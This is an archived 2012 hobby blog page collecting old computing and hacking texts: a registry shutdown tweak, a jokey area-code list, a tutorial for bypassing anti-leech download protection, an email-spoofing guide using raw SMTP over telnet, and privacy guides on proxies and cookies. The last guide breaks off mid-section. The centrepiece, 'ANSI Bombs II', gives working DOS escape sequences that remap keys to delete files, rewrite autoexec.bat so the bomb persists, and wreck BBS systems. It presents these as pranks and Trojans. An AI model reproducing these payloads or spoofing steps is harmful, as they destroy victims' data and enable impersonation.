The Yaj Computers Portal

Post Top Ad

Post Top Ad

Saturday, December 8, 2012

Friday, August 24, 2012

3:28 AM
Welcome to www.yajcomputers.com 2012.
Thank You For Visiting Us!
Enjoy!!

Saturday, June 9, 2012

Monday, June 4, 2012

10:03 PM

Auto End Tasks to Enable a Proper Shutdown

This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.

1. Copy the following (everything in the box) into notepad.


QUOTE
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"ClearPageFileAtShutdown"=dword:00000001

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"AutoEndTasks"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="1000"


2. Save the file as shutdown.reg
3. Double click the file to import into your registry.

NOTE: If your anti-virus software warns you of a "malicious" script, this is normal if you have "Script Safe" or similar technology enabled.

10:02 PM

Area Codes and Time Zones



                                Time Zones
                                ----------

 Atlantic
 --------

 Newfoundland  Nova Scotia  New Brunswick

 Eastern
 -------

 Maine  New Hampshire  Vermont  Massachussets  New York  Rhode Island
 Connecticut  Pennsylvania  New Jersey  Delaware  Maryland  Ohio  Indiana
 Michigan  West Virginia  Virginia  Kentucky  North Carolina  Tennessee
 South Carolina  Georgia  Florida  Quebec  Ontario

 Central
 -------

 Manitoba  North Dakota  South Dakota  Minnesota  Wisconsin  Michigan  Iowa
 Nebraska  Illinois  Kansas  Missouri  Kentucky  Tennessee  Arkansas  Oklahoma
 Texas  Louisiana  Alabama  Mississippi  Indiana

 Mountain
 --------

 Alberta  Saskatchewan  Montana  Idaho  Wyoming  South Dakota  Nebraska
 Utah  Colorado  Kansas  Oklahoma  Arizona  New Mexico 

 Pacific
 -------

 British Columbia  Washington  Montana  Oregon  Nevada  California  Utah


                            Area Code Listing
                            -----------------

   205 - Alabama              907 - Alaska                602 - Arizona
   501 - Arkansas             714 - California (Orange)   818 - California
   213 - California (LA)      916 - California            619 - California
   415 - California (SF)      408 - California (San Jose) 303 - Colorado
   203 - Connecticut          302 - Delaware              904 - Florida
   305 - Florida (Miami)      404 - Georgia (Atlanta)     808 - Hawaii
   208 - Idaho                312 - Illinois (Chicago)    317 - Indiana
   219 - Indiana (Souend)     515 - Iowa (Des Moines)     316 - Kansas
   502 - Kentucky             504 - Lousiana (N. Orleans) 207 - Maine
   301 - Maryland             617 - Massachusetts         313 - Michigan
   616 - Michigan             612 - Minnesota             601 - Mississippi
   816 - Missouri (Kansas C)  314 - Kansas (St. Louis)    406 - Montana
   402 - Nebraska             702 - Nevada                603 - New Hampshire
   201 - New Jersey (Newark)  609 - New Jersey (I'm here) 505 - New Mexico
   718 - NYC (Brooklyn, S.I.) 212 - NYC (Bronx, Mhattan)  518 - NY (Albany)
   716 - NY (Buffalo)         516 - NY (Long Island)      315 - NY (Syracuse)
   914 - NY (White Plains)    704 - North Carolina        919 - North Carolina
   701 - North Dakota         513 - Ohio (Cincinnati)     216 - Ohio
   614 - Ohio (Columbus)      419 - Ohio (Toledo)         405 - Oklahoma
   918 - Oklahoma (Tulsa)     503 - Oregon                215 - Philadelphia PA
   401 - Rhode Island (cough) 803 - South Carolina        605 - South Dakota
   901 - Tennessee (Memphis)  615 - Tennessee (Nashville) 806 - Texas(Cow Hell)
   214 - Texas (Dallas)       817 - Texas (Forth Worth)   713 - Texas (Houston)
   512 - Texas (San Antonio)  801 - Utah                  802 - Vermont
   703 - Virginia (Arlington) 804 - Virginia (Richmond)   202 - Washington DC
   206 - Washington (Seattle) 304 - West Virginia         608 - Wisconsin
   307 - Wyoming              666 - Where do you think

        Well that will make a nice printout for your wall, won't it.  Now
    you know where you're calling...



10:01 PM

anti leech hacking tutorial

I was just asking to know if there is some audiance before
here is my methode
for hacking anti leech
we gona use a soft calde proxo mitron
proxomitron is an anti bull script web proxy it' works buy applying some rules to elliuminte pop up and many other thing but for our cas we need to desactive all this filtring first goto
w-w.proxomitron.info
download a copy of the soft
then you need to unselect all the option of the soft
and clik on log window
no go to a anti leech web site
use the plug in and not netpumper
in the plugin
add a proxy
you must put this proxy adress
127.0.0.1 8080 for http
the same for ftp
now select the file to download a click download
watch in proximitron log winodws you will see many internal forwarding
if the file are located in a ftp server
proximitron dont handel them
and you will find an error
in a ftp adress
if it's a http adress
you will find some thing like
get /blablalma/bla/file
site tr.com
and you have foudn the adress
it' tr.com/blabla/file
10:01 PM

ANSI Bombs II: Tips and Techniques

                 
                            
    I. Introduction

    After writing the last file, a lot of people let me know about the
mistakes I had made.  I guess this file is to clear up those miscon
ceptions and to let people know about some of the little tricks behind
ANSI bombing.  Of course, ANSI bombing isn't as dangerous as a lot of
people make it out to be, but bombs are still fun to make and with a
little planning deliver some degree of success.  ANSI bombing can
be dangerous, so I am tired of hearing people say that an ANSI bomb is
harmless, another misconception I hope to clear up.  Now, most people
that have spent time experimenting with ANSI bombs probably know most
of the material in this file, but it might be fun just to read anyway.

    2. Misconceptions

    In my last file, I made three major blunders, or what I would con
sider to be major blunders.  First, I said that ANSI bombs could be
used on BBSs to screw people over, but I guess I was wrong.  It was
pure speculation on what other people had said that made me say that.
ANSI codes, including those that redefine keys, are sent over the
lines, but most comm programs don't use ANSI.SYS; they use their own
version of ANSI, which doesn't support key redefinition.  Some people
might have a program that supports it, but I haven't seen it yet.  I
have tested bombs on systems on my own and proved to myself that they
don't work.  I have also seen people fuck up bombs that would have
worked by uploading them in a message.  The second misconception is
that ANSI bombs are dangerous when put into zips.  I haven't really
tested this out much, but from what I hear with the newer versions of
PKZIP, you have to specify that you want to see ANSI comments when
unzipping.  It is unlikely that you would waste your time unzipping
something again after seeing "Format C:" in the middle of an escape
code.  I could be mistaken, but I'm pretty sure that I'm right. Third,
the last thing that was a misconception is that VANSI.SYS will protect
your system from key redefinition.  Maybe the newer versions don't
support key redefinition, but mine sure as hell does.  There are pro
grams out there that don't support it, but I don't know any of the
names.  Of course, if I were you, I would be wary about using some
thing other then ANSI.  I have a few friends that are working on "A
Better ANSI" for PDers, which, instead of being better, really screws
them over.

    3. An Overview

    Now, in case you haven't read my other file (it's called ANSI.DOC,
kind of lame but fairly informative), I'll briefly go over the struc
ture of an ANSI bomb.  Skip this part if you know what an ANSI bomb is
and how to make one.
    In ANSI everything is done with a system of escape codes.  Key
redefinition is one of those codes.  (From now, whenever I say ESC, I
really mean the arrow, ).  Here is a basic command:
                          ESC [13;27p
    This would make the <Enter> key (13 is the code for enter) turn
into the <Escape> key (27 is the code for escape).  The  always has to
be there, as do the bracket and the "p", but what is between the
bracket and the "p" is up to you.  The first number is always the key
that you want to be redefined.  If there is a zero for the first num
ber, that means the key is in the extended set, and therefore, the
first two numbers are the code.  The bracket signifies the beginning
of the definition, and the "p" signifies the end.  Whenever you want a
key pressed, you have to use it's numerical code (i.e. 13 is the code
for <Enter>).  You can't redefine strings, but you can redefine a key
to become a string (i.e. ESC [13;"Blah"p would make <Enter> say
"Blah").  Strings must be inside of quotes, which includes commands
that you want typed on the DOS prompt (i.e. ESC [13;"Del *.*";13p
would delete everything in the directory, note that 13 stands for
Enter in this case, not the redefinition).  An escape code can have
as many commands as you want in it, but each one has to be separated
by a semi-colon.  You can only redefine one key in each escape code,
so if you want to redefine another key, you have to start another
escape code.  That's about it when it comes to bombs, now that you
have the basics, all you really need is a little imagination.

    4. Tips and Tricks

    A. The Y/N Redefinition

    Now, here's a simple but fun little ANSI bomb:

                   ESC [78;89;13p ESC [110;121;13p

    Basically, all this does is turn a capital "N" into "Y" and a
lower-case "n" into "y".  Alone this doesn't do too much, except for
screw around with what they are typing.  On the other hand, try adding
this line of code to the ANSI bomb:

                   ESC [13;27;13;"del *.*";13p

    Most people would automatically press "N" when they see "Del *.*",
but when they do, they will be screwed over.  This portion of a bomb
is very useful when it comes to making good bombs.

    B. Screwing with the Autoexec.bat

    Here is another line of code that you may find useful in future
bombing projects:

                   ESC [13;27;13;"copy bomb.ans c:\";13;"copy con
                     c:\autoexec.bat";13;"type bomb.ans";13;0;109;
                     13;"cls";13p

    This line of code makes the bomb a little more permanent and a
little more dangerous.  It copies the bomb into the root directory,
then it change/creates the autoexec.bat, so the bomb is typed after
every boot-up.  Of course, the person could just boot off a disk, but
I'm sure this would get them a few time.  It could also probably
appear as though it were a virus, scaring the shit out of the owner of
the computer.

    C. Turning Commands into Other Commands

    One of the best pranks to do to someone using an ANSI bomb is to
redefine commands.  That way if they type in "copy", it will turn into
"Del *.*".  Since you can't actually change the whole string, you have
to take a different approach.  You have to change a few of the keys,
so when typed, they type and execute the desired command.  I guess it
would be coolest to have to command exactly the same length; that way
you could redefine one key at a time to obtain the desired effect.
It doesn't really matter how you do it, just as long as it works.  You
might make an ANSI that says "Wow, check out what this bomb did to
your directory", and then have it redefine the keys, so when they type
in "dir", it turns into "del".  I think you get the idea.

    D. Trojans

    By now, everybody knows what a Trojan is.  You probably wouldn't
think so, but ANSI bombs can be used as Trojans and in Trojans. First,
if you are planning on crashing a board, but you're not very good at
programming, then make yourself an ANSI bomb.  Try to find out in
which directory the main files for running the BBS are stored. They
are usually under the name BBS or the name of the software, like WWIV
or Telegard.  Then, make a bomb that either just deletes all the files
in that directory, or if you want the board to be down a longer time,
then make one that formats the Hard Drive.  In this form ANSI bombs,
if they are well planned out, can be easy to make Trojans. Second,
ANSI bombs can used in Trojans.  This is probably stretching it a
little, but say you wanted to write a Trojan that would delete a
directory, every time you typed a certain key, then you could use an
ANSI bomb.  First make some batch and com/exe files that would search
for protecting programs like Norton and turn them off.  Then you could
copy the file into the root directory, along with your versions of
autoexec.bat, config.sys, ANSI.sys, and whatever else.  (To make it
look more realistic make the files Resource.00x to trick the user,
then when copying, use the real name).  Then somehow lock the computer
up or do a warm boot through some pd program, which is easily attain
able.  When the computer loads back up, you can screw that shit out of
them with your ANSI bomb.

    5. Conclusion
    It would seem to some people that ANSI bombs are very dangerous,
and to others that they are stupid or lame.  Personally, I think that
ANSI bombs are just plain old fun.  They're not too hard to make, but
there is a lot that you can do with them.  They are nowhere near as
malicious as virii, so if you're looking for unstoppable destruction,
look elsewhere, but they do serve their purpose.  I know that there
are programs out there that help you program ANSI bombs, but I think
that they kind of take the fun out of them.  Probably, some day soon,
I'll quit making ANSI bombs and start looking more into virii and pure
Trojans.  But for now, ANSI bombs suit my purpose.

                               -TRG

    Appendix A: Key Code Program

    Here is a small program, which I find very helpful.  After loading
it up, it tells you the numeric code for every key you type in.  Spe
cial means that it is in the extended set and therefore uses zero, and
"q" ends the program.  Unfortunately,  I can't take any credit for
this program.  I got it over the phone from Heavymetl, and it was made
by his brother.  So many thanks go out to Heavymetl and his brother,
even though they'll probably be a little pissed at me for including
this in my file.  It is in Pascal and can be compiled in most Turbo
Pascal compilers.

    Use CRT;
    Var
      CH : CHAR;
    Begin
      Repeat
        CH := ReadKey;
        If CH = #0 then
          Begin
            CH := ReadKey;
            WriteLn(CH,'(Special) - ',ORD(CH));
          End
        Else
          WriteLn(CH,' - ',ORD(CH));
      Until
        CH = 'q';
    End.

    Thanks go out to:

    Heavymetl and his brother for the program and ideas.  Weapons
Master for the input and the help he has given me.  Everybody else who
has helped me out; you know who you are, or at least, you think you
know who you are.  Most of all, to those brave soldiers risking their
asses everyday for us half-way across the world in Saudi Arabia.  Your
deeds haven't gone unnoticed, of course that's mainly because that's
all the news ever shows nowadays.  Also, to anybody else I might have
forgotten.  Thanks.
10:00 PM

ANONYMOUS emails


Welcome to Tognai's guide on how to send ANONYMOUS e-mails to someone without a prog.

 I am Tognai and i am going to explain ya a way to send home-made e-mails. I mean it’s a way to send Annonimous e-mails without a program, it doesn't take
Too much time and its cool and you can have more knowledge than with a stupid program that does all by itself.

This way (to hackers) is old what as you are newby to this stuff, perhaps you may like to know how these anonymailers work, (home-made)

Well.....
Go to Start, then Run...
You have to Telnet (Xserver) on port 25

Well, (In this Xserver) you have to put the name of a server without the ( ) of course...
Put in iname.com in (Xserver) because it always work it is a server with many bugs in it.
(25) mail port.

So now we are like this.

telnet iname.com 25

and then you hit enter
Then When you have telnet open put the following like it is written

helo

and the machine will reply with smth.

Notice for newbies: If you do not see what you are writing go to Terminal's menu (in telnet) then to Preferences and in the Terminal Options you tick all opctions available and in the emulation menu that's the following one you have to tick the second option.
Now you will see what you are writing.

Then you put:

mail from:<whoeveryouwant@whetheveryouwant.whetever.whatever> and so on...
If you make an error start all over again

Example:
mail from:<askbill@microsoft.com.net>

You hit enter and then you put:

rcpt to:<lamer@lamer'sworld.com>
This one has to be an existance address as you are mailing anonymously to him.

Then you hit enter
And you type
Data
and hit enter once more

Then you write

Subject:whetever

And you hit enter

you write your mail

hit enter again (boring)

you put a simple:
.

Yes you don't see it its the little fucking point!
and hit enter
Finally you write
quit
hit enter one more time
and it's done

look: Try first do it with yourself I mean mail anonymously yourself so you can test it!
Don't be asshole and write fucking e-mails to big corps. becoz its symbol of stupidity and childhood and it has very effect on Hackers they will treat you as a Lamer!

Really i don't know why i wrote this fucking disclaimer, but i don't want to feel guilty if you get into trouble....

Disclamer:Tognai is not responsable for whetever you do with this info. you can destribute this but you are totally forbidden to take out the "By Tognai" line. You can't modify or customize this text and i am also not responsible if you send an e-mail to an important guy and insult him, and i strictly advise you that this is  for educational porpouses only my idea is for learning and having more knowledge, you cannot get busted with this stuff but i don't take care if it anyway happen to you.  If this method is new for you probably you aren't a hacker so think that if someone wrote you an e-mail "yourbestfirend@aol.com"  insulting you and it wasn't him it but was some guy using a program or this info you won't like it.so Use this method if you don't care a damn hell or if you like that someone insult you.


By Tognai
9:54 PM

Anonymity



I can see you hiding in the shadows over there and so can the logs of all the web sites, FTP servers and other nooks and crannies you visit on the web. The sort of information gathered by these logs and which is available to the webmasters of the sites you visit include the address of the previous site you visited, your IP address, your computer's ID name, your physical location and the name of your ISP along with less personal details such as the operating system you're using and your screen resolution. If someone was snooping through your dustbin to gather information on consumer trends or tracking your every move to see where it is you go everyday you wouldn't be too chuffed would you. Well the web is no different, it's still an invasion of privacy and a threat to security and you don't have to put up with it.

Proxy servers:
Every time you visit a web site, detailed information about your system is automatically provided to the webmaster. This information can be used by hackers to exploit your computer or can be forwarded to the market research departments of consumer corporations who by tracking your activities on the internet are better equipped to direct more relevant spam at you. Your best defence against this is to use what is known as a proxy server, which will hide revealing information from the web sites you visit, allowing you to surf the web anonymously. These work by altering the way in which your browser retrieves web pages or connects to remote servers. With a proxy server set up, whenever you 'ask' IE or Netscape to look at a web page, the request is first sent through an external server which is completely independent of your ISP's servers. This third party server then does the requesting on your behalf so that it appears that the request came from them rather than you and your real IP address is never disclosed to the sites you visit. There is nothing to download and the whole process takes less than a minute.

There are two different ways to use proxy servers and both have their advantages and disadvantages. The first method is to use a web based service. What this involves is visiting the proxy's home page each time you want to browse a web site anonymously. The core component of such a system is the dialog box where you enter the address of the web site you want to visit. Each time you enter the URL of the site you want to browse via the proxy into this box, your personal information, IP address and so on is first encrypted before being sent to the site allowing you to maintain your anonymity. Two of the best examples of this type of web based proxy service are Code:
hxxp://www.rewebber.com/
and hxxp://www.anonymizer.com/.

Obviously one disadvantage of using a web based service like Rewebber or Anonymizer, however, is that you have to visit the proxies home page each time you want to surf anonymously. You could choose to select this page as your default home page, but it's still quite awkward if you're forever site hopping at the speed of light. The second main 'con' is that you often have to put up with extra adverts on the pages you visit. These are automatically inserted into the pages by the proxy - they have to pay for service somehow. More sophisticated and convenient solutions are also on offer yet they come with a price tag.

The second method you can use to protect your privacy via a proxy server involves adjusting the settings of your web browser so that you can surf anonymously without having to visit the home page of your proxy each time. To do this you will first need to know the name of your proxy server and the port number it uses. This information can be gleaned from either a public proxy server list or the FAQ referring to a private subscription based service. Once you have the name of the proxy server you wish to use, select 'Internet Options' from the 'Tools' menu of your browser. Now select 'Connections' followed by 'Settings' and tick the 'use a proxy server' check box. To finish the job all you have to do now is enter the name of the server in the 'address' box, the port which it uses in the 'port' box and go forth and surf anonymously.

Free, manual proxy servers as advertised on anonymity sites, if you can find one at all, are likely to be highly oversubscribed, and as a result the speed at which they retrieve web pages can deteriorate. In which case you can go in pursuit of a public proxy server list and select an alternative from it, which can then be set up manually. To locate such a list you can investigate sites such as Code:
hxxp://www.proxys4all.com/

however, this method isn't problem free either, so before you get too carried away and go jumping on the anonymity bandwagon there are a few things you should be aware of. It's very easy to use proxies to protect your privacy, but often the disadvantages of using them far out weigh the benefits. You see, the problem is that, like the proxy servers provided Rewebber et al, free, public proxies are nearly all over subscribed and so they can slow down web browsing considerably. Digging out fast reliable proxy servers is an art form in itself and is a skill which takes considerable practice. You could find a list of public proxy servers and then experiment with each one until you find one that runs at a reasonable speed, but this can be very time consuming and frustrating. Instead, your search would be much more efficient if you got a dedicated program to carry out this task for you. There are literally dozens of proxy seeking programs around which can do just that, and many of them are available as freeware. What these do is scan the internet for public proxy servers. These servers are then tested for speed and anonymity (not all of them are truly anonymous, even if they claim to be!) and once you find one which suits your requirements you can select it as your default proxy with the click of a button.

One of the most significant advantages of using an automated tool to locate proxy servers is that you do not have to keep editing your proxy settings manually each time you wish to try out a new one. Instead, what you do is enter 'localhost' or '127.0.0.1' into the 'address' box and '8088' into the 'port' box of your browser's proxy settings menu and then forget about it. All future proxy switching is then orchestrated from within your proxy seeking software, which subsequently relays the information to your browser or whatever type of application you are attempting to make anonymous. For those of you who are curious 'localhost' and the IP address '127.0.0.1' are the names by which every computer on the internet refers to itself.
Here's a good selection of links, which should help you to get started - Code:
hxxp://www.a4proxy.com/ Anonymity 4 Proxy
hxxp://www.helgasoft.com/hiproxy/ Hi Proxy
hxxp://www.proxy-verifier.com/ Proxy Verifier
hxxp://www.photono-software.de/ Stealther.

You may find that even when using these programs you have difficulty finding good proxy servers. It is for this reason that many people choose only to use proxy servers temporarily whilst doing something which may land them in trouble with their ISP, or in a worst case scenario with the law. The most obvious example of a situation in which you would want to cover your tracks is when scanning for public FTP servers and subsequently uploading to them. Most other net activities are unlikely to incur serious consequences so under these circumstances you can safely surf the web without a proxy. If you're really serious about protecting your privacy, however, your best bet is probably to invest in a dedicated, stable proxy such as the ones offered by Code:
hxxp://www.ultimate-anonymity.com/ Ultimate Anonymity


These aren't free, but may be worth the expense if you aren't keen on continuously switching proxy servers.

Before splashing out though it may be worth checking if your current ISP has a proxy server of its own which you can use. These aren't there to help you to commit cyber crimes and get away with it, they actually have a legitimate purpose as well - otherwise they wouldn't exist. You see, proxy servers were originally designed to help speed up web page loading times. Proxy servers contain a cache of all the web pages which have been requested via the browsers of the people using the proxy. When someone surfs the web using a proxy, the proxy first checks to see if it already has a copy of the web page stored in its cache. If this version of the page is bang up to date, it is sent to your computer and appears in your browser. If the page found in the cache of the proxy server is older than the one stored on the server hosting the page, a new request to the web server is made and the page is updated in the cache of the proxy before being sent to you. Because these servers use very fast internet connections they can retrieve web pages at much greater speeds than you can via your modest home setup. If these servers are located physically nearer to your home than the web host servers you wish to retrieve web pages from, the speed at which you browse the web will be accelerated.


Anonymity - Cookies
One last important point you need to be aware of before jumping in with both feet is that different programs have to be setup in different ways before being able to make external connections via a proxy server. For example, you can surf the web anonymously by modifying the settings in Internet Explorer or Netscape Navigator as explained earlier in this tutorial, but this will only affect your browser. If you then used Flash FXP to copy a batch of 0-day releases from one FTP server to another, this isn't going to protect you in the slightest. What you have to do is enter the name of the proxy server into each application you wish to make anonymous before making any external connections. This can usually be done by browsing through the preferences of your program to see if there is a 'use proxy server' option available. If there is, make sure you use it!


Cookies:
You have little to fear from the edible variety, but the digital ones can be a major threat to your security and privacy. A cookie is a tiny text file (usually less than 1kb in size), which is created and stored on your hard drive whenever you visit a dynamic (or an interactive if you like) web site. These are used to log your personal details so that you can access members only areas of web sites without having to type in a password every time, or to retain your customised settings so that they are available the next time you visit. If you're using a shared computer, anyone who visits the same site that you have previously logged in to can access your accounts. This is particularly worrying if you have entered your credit card details into a form on an e-commerce site. If your browser is set to automatically fill in these details whenever you
return to a previously visited site, this information could be clearly visible - you don't need me to explain the problems this could entail.

The solution to this problem is to delete any cookies which contain sensitive data once you have completed your transactions. Your cookies will be stored in a different place depending on which operating system you are using so you will have to use your detective skills to find them. As an example, in Windows XP they are located in your 'c:\Documents and Settings\Kylie Minogue\Cookies' directory (that is if your name is Kylie Minogue. Mine isn't in case you're wondering!). If you look in this directory, in some cases it is easy to identify which cookie is associated with which web site, but in other cases it's not so obvious. The cookie which was created when you visited Yahoo.com to check your email may be called kylie minogue@yahoo.txt for example. Unfortunately some cookies refer to the IP address of the site you visited and so look more like kylie minogue@145.147.25.21. These cookies can be selectively deleted one at a time if it's obvious which ones are causing a threat to your security, or you can just wipe out the whole lot in one fell swoop and have them recreated as and when they are required. However, if
you're really struggling to find your cookie jar, you could delete your cookies via your browser's tool bar instead. In Internet Explorer this can be done through the 'Tools' &gt; 'Internet Options' menu items.

If all this sounds like too much hassle, you can always find a labour saving program which will be happy to take the job off your hands. These 'cookie crunching' programs allow you to be more selective when editing, viewing and deleting cookies from your system, and some of them will even prevent cookies from being created in the first place. Yes, I know you're hungry for links so I won't deprive you. Have a look here - Code:
hxxp://www.rbaworld.com/Programs/CookieCruncher/ Cookie
Cruncher
hxxp://www.thelimitsoft.com/ Cookie Crusher
hxxp://www.angove.com/ Cookie Killer
hxxp://www.kburra.com/ Cookie Pal
and
hxxp://www.cookiecentral.com/ Cookie Web Kit.
9:53 PM

Anonymity of Proxy



The exchange of information in Internet is made by the "client - server" model. A client sends a request (what files he needs) and a server sends a reply (required files). For close cooperation (full understanding) between a client and a server the client sends additional information about itself: a version and a name of an operating system, configuration of a browser (including its name and version) etc. This information can be necessary for the server in order to know which web-page should be given (open) to the client. There are different variants of web-pages for different configurations of browsers. However, as long as web-pages do not usually depend on browsers, it makes sense to hide this information from the web-server.

What your browser transmits to a web-server:
a name and a version of an operating system
a name and a version of a browser
configuration of a browser (display resolution, color depth, java / javascript support, ...)
IP-address of a client
Other information

The most important part of such information (and absolutely needless for a web-server) is information about IP-address. Using your IP it is possible to know about you the following:
a country where you are from
a city
your provider?s name and e-mail
your physical address

Information, transmitted by a client to a server is available (accessible) for a server as environment variables. Every information unit is a value of some variable. If any information unit is not transmitted, then corresponding variable will be empty (its value will be undetermined).

These are some environment variables:

REMOTE_ADDR ? IP address of a client

HTTP_VIA ? if it is not empty, then a proxy is used. Value is an address (or several addresses) of a proxy server, this variable is added by a proxy server itself if you use one.

HTTP_X_FORWARDED_FOR ? if it is not empty, then a proxy is used. Value is a real IP address of a client (your IP), this variable is also added by a proxy server if you use one.

HTTP_ACCEPT_LANGUAGE ? what language is used in browser (what language a page should be displayed in)

HTTP_USER_AGENT ? so called "a user?s agent". For all browsers this is Mozilla. Furthermore, browser?s name and version (e.g. MSIE 5.5) and an operating system (e.g. Windows 98) is also mentioned here.

HTTP_HOST ? is a web server?s name

This is a small part of environment variables. In fact there are much more of them (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING, HTTP_CACHE_CONTROL, HTTP_CONNECTION, SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, ...). Their quantity can depend on settings of both a server and a client.

These are examples of variable values:

REMOTE_ADDR = 194.85.1.1
HTTP_ACCEPT_LANGUAGE = ru
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP_HOST = www.webserver.ru
HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)
HTTP_X_FORWARDED_FOR = 194.115.5.5

Anonymity at work in Internet is determined by what environment variables "hide" from a web-server.

If a proxy server is not used, then environment variables look in the following way:

REMOTE_ADDR = your IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

According to how environment variables "hided" by proxy servers, there are several types of proxies
Transparent Proxies

They do not hide information about your IP address:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = your IP

The function of such proxy servers is not the improvement of your anonymity in Internet. Their purpose is information cashing, organization of joint access to Internet of several computers, etc.
Anonymous Proxies

All proxy servers, that hide a client?s IP address in any way are called anonymous proxies

Simple Anonymous Proxies

These proxy servers do not hide a fact that a proxy is used, however they replace your IP with its own:
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = proxy IP

These proxies are the most widespread among other anonymous proxy servers.

Distorting Proxies

As well as simple anonymous proxy servers these proxies do not hide the fact that a proxy server is used. However a client?s IP address (your IP address) is replaced with another (arbitrary, random) IP:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = random IP address
High Anonymity Proxies

These proxy servers are also called "high anonymity proxy". In contrast to other types of anonymity proxy servers they hide a fact of using a proxy:

REMOTE_ADDR = proxy IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

That means that values of variables are the same as if proxy is not used, with the exception of one very important thing ? proxy IP is used instead of your IP address.
Summary

Depending on purposes there are transparent and anonymity proxies. However, remember, using proxy servers you hide only your IP from a web-server, but other information (about browser configuration) is accessible!
9:53 PM

Anonymity complete GUIDE


Anonymity on the web


[ t a b l e o f c o n t e n t s ]
01 - table of contents
02 - introduction
03 - first tips
04 - about proxies
05 - cookies
06 - ftp transfers
07 - secure transactions
08 - SSL tunelling
09 - anonymity on irc
10 - mail crypto (and pgp usage)
11 - icq privacy
12 - spyware
13 - cleaning tracks
14 - ending words

[ introduction ]
Nowadays, everyone wants privacy on the web, because no matter where you go, someone could be watching you. Someone like your employer, someone trying to hack your system, companies gathering all your info to sell to yet other companies, or even the government, may be on your track while you peacefully surf the web. Thus, anonymity on the web means being able tu use all of its services with no concern about someone snooping on your data.
Your computer being connected to the net has an IP [Internet Protocol] address. If you have a dial-up connection, then your IP changes every time you connect to the internet (this is not always true, though. There are dialup isps, specially for university students, that do have static ips). Cable modems and DSL connections have a static IP, which means that the IP address does not change. One of the goals of getting anonymous is to make sure your ip, either static or dynamic) isn't revealed to other users of the internet, or to server administrators of the servers you roam around when using internet services.
This text tries to give you some hints on how to maintain your anonimity on the web. Some of the hints may sound banal, but think of, if you really abide them in every situation.

[ first tips ]
When chatting on IRC, ICQ, AIM (etc..), do not give out personal information about yourself, where you live, work, etc.
Do not use your primary email address (the one your ISP gave you) anywhere except to family members, close friends or trusted people. Instead create for yourself a web-based email account such as yahoo, hotmail, dynamitemail, mail.com, etc. and use this e-mail address to signing up for services, when in the need to give your mail to download something, or to publish on your homepage.
When signing up for services on the web, don't give your real information like address, phone number and such unless you really need to do so. This is the kind of information that information gathering companies like to get, so that they can sell out and fill your mailbox with spam.
Use an anonymous proxy to surf the web. This makes sure your ip doesn't get stored on the webserver logs. (Webservers log every GET request made, together with date, hour, and IP. This is where the proxy comes in. They get the ip from the proxy, not yours)
Use a bouncer to connect to IRC networks, in case you don't trust the administrators, or the other users. A bouncer is a program that sits on a permanently connected machine that allows you to connect there, and from there to the irc server, just like a proxy works for webservers.
Use anonymous remailers to send out your e-mails.
Cryptography can also help you by making sure the material you send out the web, like by email, etc, is cyphered, not allowing anyone that doesn't have your key to read it (in key-based cryptography). Programs like PGP (pretty good privacy) are toolkits with all you need to cypher and uncypher your stuff.
Delete traces of your work with the computer including history files, cache or backup files.
[ about proxies ]
Proxies are caches that relay data. When you configure your web browser to use a proxy, it never connects to the URL. Instead it always connects to the proxy server, and asks it to get the URL for you. It works similarly with other type of services such as IRC, ICQ etc. There'll won't be direct connection between you and the server, so your real IP address won't be revealed to the server. When you view a website on the server, the server won't see your IP. Some of web proxies do not support forwarding of the cookies whose support is required by some of the websites (for ex. Hotmail).
Here are some anonymous proxies that you can use to surf anonymously (notice that some of these may be a payed service):
Aixs - http://aixs.net/
Rewebber - http://www.anon.de/
Anonymizer - http://www.anonymizer.com/
The Cloak - http://www.the-cloak.com/
You'll highly probably find many websites that provide the lists of unauthorised proxies and remailers . Such lists are being compiled usually with the help of port scanners or exploit scanners, scanning for computers with wingate or other proxies' backdoors. Using these proxies is illegal, and is being considered as unauthorized access of computer. If you get such list to your hands, check if the info is legal or compiled by script kiddie, and act acordingly.
If you anyhow decide not to use proxy, at least do not forget to remove your personal information from your browser. After you remove details like your name and e-mail address from your browser, the only info a Web site can sniff out is your ISP's address and geographical location. Also Java and JavaScript applets can take control of your browser unexpectedly, and if you are surfing to unknown and potentially dangerous places you should be aware of that. There are exploitable browser bugs (mainly Internet explorer ones) reported ever week.

[ cookies ]
Maybe you're not aware of the fact that if you have the "allow cookies" feature in your browser on, websites can store all sorts of information on your harddrive. Cookies are small files that contain various kind of information that can be read bt websites when you visit them. The usual usage is to track demographics for advertising agencies that want to see just what kinds of consumers a certain site is attracting. Web sites also use cookies to keep your account information up-to-date. Then for instance when you visit your e-mail webbased account without being unlogged some hours later, you find yourself being logged on, even if you turn off your computer. Your login and password was simply stored on your harddrive in cookie file. This is security threat, in case that there is more persons who have the access to your computer.
Most of the browsers offer the possiblity to turn off the cookies, but some of sites like Hotmail.com require them to be turned on. In case you decided to allow cookies, at least never forget to log off from the websites when you're finishing visiting them.

[ ftp transfers ]
When using an FTP client program to download files, assure yourself, that it's giving a bogus password, like guest@unknown.com, not your real one. If your browser lets you, turn off the feature that sends your e-mail address as a password for anonymous FTP sessions.

[ secure transaction ]
Everything being sent from the web server to your browser is usually in plain text format. That means, all transferred information can be easily sniffed on the route. Some of the web servers support SSL (which stands for Secure Socket Layer). To view and use these websites you'll need SSL support in your browser as well. You recognize, that the connection is encrypted, if URL starts with https:// instead of usual http://. Never use web server without SSL for sending or receiving sensitive private or business information (credit card numbers, passwords etc.)

[ SSL tunelling ]
What is SSL?
